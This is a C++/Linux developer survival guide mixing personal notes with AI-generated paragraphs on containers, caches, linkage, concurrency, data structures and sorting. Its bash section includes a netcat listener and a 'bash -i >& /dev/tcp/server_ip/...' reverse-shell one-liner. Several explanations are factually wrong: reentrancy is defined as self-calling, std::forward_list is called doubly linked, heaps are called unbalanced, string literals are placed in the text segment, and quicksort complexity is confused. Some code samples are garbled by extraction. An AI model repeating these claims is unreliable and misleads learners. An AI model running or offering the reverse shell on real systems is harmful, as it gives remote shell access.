A Computer Science survival guide for C++/Linux developers
Sat Mar 25 05:03:53 UTC 2023
Let’s start with a haiku written by a computer.
A powerful friend
C++ is here for the long run
Friendly and strong code
This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.
If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.
The C++ Standard Library containers are a powerful and efficient way to organize data and store it for easy retrieval. They provide a consistent interface for manipulating data and enable users to easily access and manipulate data in a convenient and efficient manner. The containers also provide a range of features such as memory management, performance optimization, and scalability that can help make the development process easier and more efficient.
Sequence containers are containers that store elements in a linear fashion, with the elements being laid out in a specific order based on their position within the container. Examples of sequence containers include vectors, deques, and lists.
Associative containers are containers that store elements in an organized fashion, with the elements being laid out in a specific order based on a key associated with each element. Examples of associative containers include maps, sets, and multisets.
Processor caches are small, high-speed memory caches built into a processor to reduce the average time required to access data from the main memory. Caches store frequently used instructions and data so that the processor can access them quickly, reducing latency and allowing the processor to operate more efficiently. Caches are divided into levels, with the fastest and smallest caches located closer to the processor core, and larger and slower caches located further away.
Cache coherence is a mechanism that maintains the consistency of data stored in multiple caches, so that data accessed by one processor is the same as that accessed by another. It ensures that when one processor reads a shared memory location, it will see the most up-to-date value. Cache coherence is an important part of computer architecture that helps to maintain data integrity in a system with multiple processors.
There are three kinds of cache misses:
Cache misses occur when a processor tries to access data from the cache, but the data is not present in the cache. This causes the processor to access the data from the main memory, resulting in a slower operation and increased latency. Cache misses can be caused by a variety of factors, including insufficient cache size, an inefficient cache design, or an attempt to access data that was evicted from the cache due to memory constraints.
+ (vec.size() & 1)
The way virtual functions work may cause issues with caching.
But we may be able to use CRTP to avoid the first two.
Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.
Design to get the most value out of every single cacheline that is read. Split apart the functions and data.
Cache locality is the tendency of a processor to access the same set of data or instructions repeatedly. It refers to the physical proximity of related data and instructions in memory. High cache locality can improve performance by reducing the number of memory accesses required to process a given set of data or instructions, reducing the amount of time spent waiting for memory accesses to complete.
Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.
See wikipedia.
time/program = instructions/program * clockCycles/instruction * time/clockCycles
Amdahl’s law, named after computer scientist Gene Amdahl, is a concept in computer architecture that states that the theoretical speedup of a program using multiple processors in parallel computing is limited by the time needed for the sequential fraction of the program. In other words, the speedup that can be achieved by adding more processors is limited by the portion of the program that cannot be parallelized.
It’s very easy to optimise the bits your are familiar with but not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.
Internal Linkage: Internal linkage is a type of linkage that restricts visibility of an object or function to the same translation unit. Objects or functions with internal linkage can only be accessed within the same translation unit. This is done by using the static keyword before the type and name of the object or function.
External Linkage: External linkage is a type of linkage that allows an object or function to be accessed from outside the translation unit in which it is declared. Objects or functions with external linkage can be accessed from any translation unit. This is done by not using the static keyword before the type and name of the object or function.
Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.
http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco
If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.
Used to declare many things with internal linkage.
namespace {
int a = 0;
int b = 0;
int c = 0;
}
Features of note since C++11.
From the presentation by Marc Gregoire (CppCon 2022).
data[x, y, z]
and
std::mdspan
constevel
– immediate functions: only execute at
compile timeuz
literalsstd::print
– not supported in gcc 12.2import std;
– modulesstd::flat_map
std::flat_set
<generator>
basic_string::contains()
.contains
for strings and containers<stack_trace>
std::expected
std::byteswap
constexpr
for std::optional
and
std::variant
std::ranges::fold_left
flat_map
– contiguous mapimport <iostream>;
– modulesranges_to<>
– convert a range to a vector
(say)<print>
headerA lot of effort has gone into ranges and views C++23.
starts_with
shift_left
ranges::to
– not supported in gcc 12.2find_if
contains
contains_subrange
fold_left
zip
adjacent
pairwise
chunk
slide
chunk_by
join_with
stride
– take every nth elementrepeat
iota
– infinite views may be more performant as no
boundary check.contains
for maps.starts_with
for stringsstd::jthread
– thread you don’t have to explicitly join
(it’s the same as std::thread
but joins in the destructor),
and also has a built-in stop tokenstd::barrier
for thread synchronisation (like
std::latch
but reusable)std::filesystem
– from Booststd::string_view
std::clamp
C++14 is an extension and improvement of C++11.
0b1111000
auto
return typeauto
in lambda
parameterstemplate <class T> constexpr T bins = T{24'576};
decltype(auto)
constexpr
(catching UB)See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.
Code segment: This segment contains the actual machine code instructions of the program.
Data segment: This segment contains global and static variables, initialized and uninitialized.
BSS segment: This segment contains uninitialized global and static variables.
Text segment: This segment contains the program’s string literals.
Heap segment: This segment is used for dynamic memory allocation during the run-time of the program.
Stack segment: This segment stores local variables and function calls. It is also used for parameter passing between functions.
This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.
std::move
&&
modifier indicates parameter is an object
that we intend to move from instead of copyingnoexcept
(they are anyway)noexcept
A test is not a unit test if:
See the complete article.
In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.
1 000 kilo | milli .001
1 000 000 mega | micro .000 001
1 000 000 000 giga | nano .000 000 001
1 000 000 000 000 tera | pico .000 000 000 001
1 000 000 000 000 000 peta | femto .000 000 000 000 001
1 000 000 000 000 000 000 exa | atto .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001
See list of SI prefixes.
You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 1000^3 rather than 2^20 because it makes their performance look better.
See why is everyone in such a rush?
1/1000000000 second == 1 nanosecond
Approximate durations of typical operations (rounded to help remember.)
Action | Duration (nanoseconds) |
---|---|
L1 cache read / variable increment | <1 |
Branch misprediction | 5 |
L2 cache read / std::atomic increment |
10 |
Mutex lock/unlock / std::scoped_lock |
20 |
Fetch from main memory | 100 |
Send 2KiB over 1Gbps network | 20,000 |
Create a std::thread |
20,000 |
Send packet from US to Europe and back | 200,000,000 |
Object-oriented programming (OOP) is a programming language model organized around objects rather than "actions" and data rather than logic. It attempts to simulate the real world by creating objects that contain data and code to manipulate that data. OOP languages allow developers to create objects that can be reused in different programs. This modularity allows for more efficient development and maintenance of programs. OOP emphasizes the concept of inheritance, which allows objects to acquire the properties and behaviours of the objects from which they are derived. This allows for code reuse and reduces the need for rewriting code. OOP also encourages the use of abstraction, which reduces the amount of code needed to solve a problem. In addition, OOP facilitates the use of polymorphism, which allows the same code to be used for different types of objects.
Polymorphism refers to the ability for different types of data to be treated the same way. There are two main types of polymorphism:
Ad-hoc polymorphism: Ad-hoc polymorphism is when a function or operator can take multiple types of arguments. This is commonly seen in languages such as Java and C++, where a single function can accept arguments of different types.
Parametric polymorphism: Parametric polymorphism is when a function or operator can take multiple types of arguments, but the type of argument is specified when the function is defined. This type of polymorphism is commonly seen in languages such as Haskell and ML, where a function can accept arguments of a specified type.
A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.
Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.
The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).
In derived classes, you should mark overridden methods as
override
to express intention and also protect from the
base class being changed unwittingly.
A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)
A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.
RAII (Resource Acquisition Is Initialization) is a technique used in object-oriented programming to ensure that resources are properly allocated, released, and managed. It is achieved by tying the lifetime of the resource to the lifetime of an object. When the object is created, its resources are acquired, and when the object is destroyed, the resources are released. This ensures that resources are always released in a timely manner and helps prevent memory leaks and other resource-related issues.
For simple readonly types, pass by const value.
void func(const int p) {
}
For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.
void func(const big_type& p) {
}
If the first thing you do is make a copy, pass by non-const value.
void func(int p) {
}
If you want to modify the caller’s copy, pass by non-const reference.
void func(int& p) {
}
The only difference between a class and a struct is the default access level: public, protected, private.
But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)
Either way, you can test your assertions at compile time with
static_assert
and the type
traits header.
struct A {
// public: <-- default for structs
int x_;
};
If the data are constrained by an invariant – i.e., not all values are valid – use a class.
class B {
private: // <-- default for classes
int x_; // must be between 0-1000
};
See OSI on Wikipedia.
Layer | Function |
---|---|
Layer 7 | Application |
Layer 6 | Presentation |
Layer 5 | Session |
Layer 4 | Transport |
Layer 3 | Network |
Layer 2 | Data Link |
Layer 1 | Physical |
The TCP three-way handshake is a process that is used in a TCP/IP network to establish a connection between a local host/client and a remote host/server. It is a three-step process that requires both the client and server to exchange SYN and ACK (acknowledgement) packets before actual data communication begins.
The client sends a SYN packet to the server, requesting to open a connection.
The server responds with a SYN-ACK packet, acknowledging the request and confirming that the connection can be opened.
The client responds with an ACK packet, acknowledging the server’s SYN-ACK packet and confirming that the connection is established.
Once this three-way handshake is complete, the client and server can communicate and exchange data.
SYN stands for “synchronise”.
=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK
constexpr
– find undefined behaviour at compile
timeTemplate metaprogramming (TMP) is a technique used in C++ programming that utilizes template classes and functions to generate code at compile-time, as opposed to run-time. TMP is often used to improve the performance of code by removing the need for dynamic memory allocation and reducing the amount of code that needs to be written. It is also used to write generic code that can be used with any type of data structure or object. TMP can be used to solve complex problems that would otherwise be difficult to code. Examples of TMP include type traits, compile-time assertions, and recursive templates.
Templates are an important part of the C++ Standard Library, as they provide a way to create generic, type-independent algorithms and data structures. Templates allow developers to write code that can be reused with any type of data, without needing to rewrite the code for each specific data type. This reduces the amount of time and effort required to develop a program, as well as making it much easier to maintain and debug. Templates are used in the C++ Standard Library to define classes, such as containers and iterators, as well as algorithms, such as sorting and searching.
SFINAE (Substitution Failure Is Not An Error) is a C++ concept that allows for the substitution of non-matching function templates without causing a compiler error. It works by ignoring any substitution that would cause a compiler error and then substituting the next viable template. This allows for more flexible template programming, as it allows for different templates to be used in different scenarios.
As a Linux developer you need a strong command line game.
bash
is ubiquitous, and a powerful language in itself,
without resorting to something like Python.
git
is awesome on the command line and pretty much
essential. Use it to manage your chores.
See how to undo almost anything with git.
(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80
# server
nc -knvlp 3389
# client
bash -i >& /dev/tcp/server_ip/3389 0>&1
git add !(unit.md)
shuf -n 1 readme.txt
From bash 5.
echo $EPOCHREALTIME
1614870873.574544
echo $EPOCHSECONDS
1614870876
The three load average values are 1, 5 and 15 minutes.
uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51
Stress your system in different ways.
stress --cpu 8
echo $(nproc)
localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut
mv {,_}.bash_history
watch -d ip a
pushd
equivalentI use this all the time. Rather than pushd
and
popd
to navigate around the file system:
# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post
# Return whence you came
cd -
You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet
Complexity | Definition |
---|---|
Constant | O(1) |
Logarithmic | O(log n) |
Linear | O(n) |
Linearithmic | O(n log n) |
Quadratic | O(n^2) |
Cubic | O(n^3) |
Exponential | O(2^n) |
Linked lists and arrays both have different complexities depending on the operation being performed. Generally speaking, the average complexity of linked lists is O(n) while the average complexity of arrays is O(1). This means that linked lists tend to be slower than arrays when performing operations, but they offer more flexibility and are better suited for dynamic data structures.
Multi-threaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.
tl;dr “A computer program or subroutine is called reentrant if multiple invocations can safely run concurrently on a single processor system.”
Reentrancy is a programming concept in which a function can call itself while it is already running. This allows a function to repeat its operations until a certain condition is met. Reentrancy can be used to simplify complex programming tasks, such as looping and recursion. In addition, reentrant code can be used to improve performance, as the same code can be used multiple times without the need to start a new instance of the function each time.
tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”
A race condition in computer science is a situation or sequence of events where the output of a program or system is dependent on the timing or order of other events. This can occur when multiple threads or processes access shared resources in a shared environment without proper synchronization. In this case, the order in which the threads or processes run can affect the outcome of the program. If one thread runs before another, it can take ownership of the shared resource, causing the second thread to fail or return an incorrect result. Race conditions can cause unpredictable results or even system crashes.
Deadlocks and livelocks are both types of system resource contention that can occur in computer systems.
Deadlocks occur when two or more processes are waiting for the same resources and neither can continue until those resources are released by the other process. This creates an impasse where neither process can make any progress.
Livelocks, on the other hand, are situations where two or more processes are constantly trying to acquire the same resources, but none of them ever actually succeeds. This can lead to an infinite loop of attempts, with none of the processes ever making any progress.
Run your code on different numbers of CPUs. It’s interesting how the bottlenecks move around depending on the available resources; and it’s really easy to write software that doesn’t run on one core.
Make sure that all transactions are short and efficient.
Ensure that all transactions acquire locks in the same order.
Use timeouts to avoid waiting for a resource that is locked by another transaction.
Avoid using nested transactions.
Use a deadlock detection and resolution mechanism to detect and resolve deadlocks.
Minimize the number of locks per transaction.
Use a read-committed isolation level.
Monitor and analyze deadlock logs.
std::scoped_lock
A mutex is a synchronization primitive that allows only one thread to access a resource at a time. It is used to protect shared resources from concurrent access. A semaphore is a synchronization primitive that allows multiple threads to access a resource at a time. It is used to control access to a shared resource by several processes. A mutex is typically used to provide exclusive access to a resource, while a semaphore is used to control access to a resource by multiple processes.
tl;dr A thread is a branch of execution. A process can consist of multiple threads.
Threads are a subset of processes. A process is a program in execution, while a thread is a single flow of control within the process. A process can contain multiple threads, which share the same address space and can communicate with each other. Threads have less overhead than processes, and so they can be used to improve the performance of an application.
A hash function is a mathematical algorithm that takes an input of any size and produces an output of a fixed size. It is used to provide a digital fingerprint of a piece of data and is typically used in cryptography and data security applications.
Design patterns are reusable solutions to commonly occurring problems in software design. The objective of design patterns is to provide developers with a reliable, easy-to-understand set of instructions for tackling a particular problem. They also provide a common language for developers to communicate about problems and solutions. Design patterns can help developers create more flexible, maintainable, and scalable code.
The Factory Design Pattern is a software design pattern that is used to create objects or products. This pattern provides a way to create objects without exposing the creation logic to the client and refers to the newly created object using a common interface. It is one of the most commonly used creational patterns due to its simplicity.
The Factory Design Pattern consists of four components: a product interface, a concrete product, a factory interface, and a concrete factory. The product interface defines the interface of the product object and any methods or properties that the object must have. The concrete product is an implementation of the product interface. The factory interface defines the interface of the factory object and any methods or properties that the factory must have. The concrete factory is an implementation of the factory interface that is responsible for creating the product object.
The Factory Design Pattern can be used in scenarios where the type of object to be created is not known until runtime. It also enables the client to create objects without having to specify the exact type of object to be created. This pattern also allows the client to create a single instance of an object and use it throughout the application.
The Factory Design Pattern is a useful tool to keep code organized, flexible, and extensible. It also provides a way to create objects in an easily testable manner. This pattern encourages code reuse and makes it easier to maintain code by isolating the creation process from the rest of the application.
Store a system configuration in an external text file and construct at runtime using the factory pattern.
The Visitor Design Pattern is a behavioral software design pattern that allows for the separation of an algorithm from an object structure on which it operates. It is one way to follow the open/closed principle. This pattern allows for a new operation to be added to a set of classes without having to modify any of the existing classes. It is often used when an object structure contains many objects of different types, and you need to perform an operation on all of them. The Visitor Pattern defines a new operation to a class without changing the class. Instead, a visitor class is created that takes the object reference as input, and then implements the operation. This makes it possible to add new operations to existing object structures without changing the objects themselves.
The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”
Double dispatch in subtype polymorphism is a technique where two objects of different types are used to determine the behavior of a method. This technique occurs when a method call is made on an object and the method is dispatched based on both the type of the method and the type of the object being called. This allows for different behavior to be executed depending on the types of the objects being used. Double dispatch is an interesting technique as it enables an object to respond differently to a method call depending on the type of the object it is called on.
Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.
Hardware interface classes will typically be a const
register map which is a flyweight pattern. This is also an example of a
singleton pattern as it’s only initialised once regardless of how many
instances are created. Additionally if registers are actually wired to
discrete lines they might be read-only, so the memento pattern is used
to store the internal state.
“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”
See Wikipedia.
Dependency inversion is a software design principle that states that high-level modules (e.g. business logic) should not depend on low-level modules (e.g. database access), but rather be decoupled from them. This helps to reduce the complexity of the software architecture and make it more extensible.
Less common but another set of principles to consider.
It’s important to know the common data structures and their characteristics.
std::vector
std::vector
is the go-to container, so let’s give it
some special attention. It has contiguous storage – therefore cache
friendly – and uses the RAII
paradigm: the data are created on the heap and the allocation and
deallocation (new/delete) are handled for you. Interestingly,
std::string
exhibits many of the same characteristics, but
it’s not quite containery enough to qualify.
Estimate how many times the fax
destructor is called
below.
#include <iostream>
#include <vector>
auto x = 0uz;
int main() {
struct fax {
// Default constructor and destructor
() { std::cout << x << " ctor\n"; }
fax~fax() { std::cout << "\t" << x << " dtor\n"; }
// Copy constructors
(const fax&) { std::cout << x << " copy ctor\n"; };
fax(fax&&) { std::cout << x << " move ctor\n"; };
fax
// Assignment constructors
& operator=(const fax&) {
faxstd::cout << x << " copy assignment ctor\n";
return *this;
}
& operator=(fax&&) {
faxstd::cout << x << " move assignment ctor\n";
return *this;
};
const size_t id = x++;
};
std::vector<fax> y;
// Reduce copies by allocating up front
// y.reserve(3);
for (size_t i = 0; i < 3; ++i) {
.push_back(fax{});
ystd::cout << "-- capacity " << y.capacity() << " --\n";
}
// fax f1 = fax{};
// fax f2 = std::move(fax{});
}
}
See the program output (below), note how the capacity is growing exponentially (doubling each time).
1 ctor
2 move ctor
2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
5 dtor
5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
9 dtor
9 dtor
9 dtor
-- capacity 4 --
9 dtor
9 dtor
9 dtor
For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.
std::set
and std::map
are implemented using
a red-black tree, a type of balanced binary search tree. C++23
introduces std::flat_map
which is implemented using
contiguous storage to make it more cache-friendly.
Binary search trees (BST) are a type of data structure that operates on a tree-like structure and has the following properties:
Binary search trees are used to store and quickly retrieve data. They are commonly used for dictionary and symbol table implementations.
A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.
Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.
e| /e
d| d
c| / \c
b| b
a| / \ /a
9|----- / 9
8| / \8
7| 7
6| \ /6
5|----- \ 5
4| \ / \4
3| 3
2| \ /2
1| 1
0| \0
Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.
std::unordered_set
and std::unordered_map
are implemented using hash tables.
A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.
Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.
123456789abcedef
1
23
4567
89abcdef
Project down, the top of the tree is a smallest element.
1
2 3
4 5 6 7
8 9 a b c d e f
1
/ \
/ \
/ \
2 3
/ \ / \
4 5 6 7
/ \ / \ / \ / \
8 9 a b c d e f
A heap is a data structure that is typically used to implement a priority queue, where elements are organized in a tree-like structure with the highest priority elements at the top. A binary search tree is a data structure used to store sorted data in which each node contains a value and two pointers, one pointing to a node with a value less than the current node and one pointing to a node with a value greater than the current node. Heaps are typically unbalanced, while binary search trees must be balanced in order to maintain a logarithmic search time.
Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).
std::forward_list
is a singly linked list.
Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).
std::forward_list
is a doubly linked list.
Container | Insert | Delete | Access | Search |
---|---|---|---|---|
vector | O(1)* | O(n) | O(1) | O(n) |
deque | O(1) | O(n) | O(1) | O(n) |
list | O(1) | O(1) | O(n) | O(n) |
set | O(log n) | O(log n) | O(log n) | O(log n) |
map | O(log n) | O(log n) | O(log n) | O(log n) |
unordered_set | O(1) | O(1) | O(1) | O(1) |
unordered_map | O(1) | O(1) | O(1) | O(1) |
*O(1) amortized constant time when inserting at the end
However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything.
This is all a lot easier since std::thread
was
introduced in C++11. Now we have a platform dependent interface.
See the C++ concurrency support library examples.
However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?
std::async
Think of it like pushing a calculation into the background.
std::async
executes a function asynchronously and returns a
std::future
that will eventually hold the result of that
function call. Quite a nice way to reference the result of calculation
executed in another thread.
std::thread
You need to call join()
for every thread created with
std::thread
. Typically it’s done by storing your threads as
a vector and joining each of them in a loop.
std::jthread
Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.
Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.
std::execution::seq
: execution may not be
parallelizedstd::execution::par
: execution may be parallelizedstd::execution::par_unseq
: execution may be
parallelized, vectorized, or migrated across threads (such as by a
parent-stealing scheduler)std::execution::unseq
: execution may be vectorized,
e.g., executed on a single thread using instructions that operate on
multiple data itemsSome of these have an _if
version that takes a
additional predicate: e.g., std::replace
and
std::replace_if
.
std::sort
std::copy
std::transform
std::accumulate
std::for_each
std::reduce
std::inclusive_scan
std::exclusive_scan
std::transform_reduce
std::remove
std::count
std::max_element
std::min_element
std::find
std::generate
std::mutex
A standard way to protect access to something, but there are multiple ways to unlock it.
Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more.
You can use std::scoped_lock
with multiple resources or
single, but I think they express intention better, by virtue of having
“scope” in the name.
std::mutex
std::atomic
std::scoped_lock
std::lock_guard
std::thread
and std::join
std::jthread
(auto join)See the Standard Library concurrency support library.
#include <iostream>
#include <thread>
#include <mutex>
#include <condition_variable>
#include <queue>
std::mutex m;
std::condition_variable cv;
std::queue<int> q;
const int BufferSize = 10;
void producer()
{
for (int i = 0; i < 50; i++) {
std::unique_lock<std::mutex> lk(m);
.wait(lk, []{return q.size() < BufferSize;});
cv.push(i);
q.unlock();
lk.notify_one();
cvstd::cout << \"Produced \" << i << std::endl;
}
}
void consumer()
{
for (int i = 0; i < 50; i++) {
std::unique_lock<std::mutex> lk(m);
.wait(lk, []{return !q.empty();});
cvint item = q.front();
.pop();
q.unlock();
lk.notify_one();
cvstd::cout << \"Consumed \" << item << std::endl;
}
}
int main()
{
std::thread t1(producer);
std::thread t2(consumer);
.join();
t1.join();
t2return 0;
}
The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.
Quicksort is the poster boy of sorting algorithms.
The time complexity of quicksort is O(nlog(n)). This means that it has a time complexity of O(n^2) in the worst case scenario, but is usually much faster than other sorting algorithms like insertion sort and bubble sort.
Below is a Python implementation just for fun. But how is it implemented in C++?
def quicksort(arr):
if len(arr) <= 1:
return arr
else:
= arr[len(arr) // 2]
pivot = [x for x in arr if x < pivot]
left = [x for x in arr if x == pivot]
middle = [x for x in arr if x > pivot]
right return quicksort(left) + middle + quicksort(right)
# Sample input
= [3, 6, 8, 10, 1, 2, 1]
arr
# Sample output
print(quicksort(arr)) # [1, 1, 2, 3, 6, 8, 10]
Introsort is a hybrid sorting algorithm that combines the best aspects of both quicksort and heapsort. It is usually the default sorting algorithm used in the C++ Standard Template Library (STL). Introsort begins by sorting the data with quicksort. If the quicksort algorithm fails to make sufficient progress, it switches to heapsort. Introsort can also be tuned to switch to heapsort earlier to reduce the risk of quicksort’s worst-case performance. Introsort terminates when the data is sorted or the maximum recursion depth is reached. Introsort is an efficient and robust sorting algorithm with an average-case complexity of O(n log n).
Introsort is in place but not stable: i.e., equivalent
elements are not guaranteed to remain in the same order. However, the
Standard Library offers stable_
versions of various sorting
algorithms.
If additional memory is available,
stable_sort
remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.
https://leanpub.com/cpp-algorithms-guide
The threshold for switching to insertion sort varies for each compiler.
std::list
std::sort
requires random access to the elements, so
std::list
has its own sort method, but it still
(approximately) conforms to O(n log n). It can be implemented with merge
sort as moving elements is cheap with a linked list.
Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.
The complexities of various sorting algorithms can vary greatly depending on the algorithm used and the complexity of the data being sorted. Generally speaking, the most common sorting algorithms have the following complexities:
Bubble Sort: O(n²) Selection Sort: O(n²) Insertion Sort: O(n²) Merge Sort: O(nlogn) Quick Sort: O(nlogn) Heap Sort: O(nlogn)
As you can see, Merge Sort and Quick Sort are the most efficient algorithms, as they have the lowest complexity, followed by Heap Sort. Bubble Sort and Selection Sort are the least efficient algorithms, as they have the highest complexity.
All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.
Mergesort breaks the problem into smallest units then combines adjacent
Timsort finds runs of already sorted elements and then use mergesort; O(n) if already sorted
Heapsort can be thought of as an improved selection sort
Radix sort is a completely different solution to the problem
A sorted array is already a min heap
Comprehensive list of C++ standard library container complexities
Hacking Cpp – a nice breakdown of Standard Library algorithms
Sorting Algorithms: Speed Is Found In The Minds of People - Andrei Alexandrescu - CppCon 2019.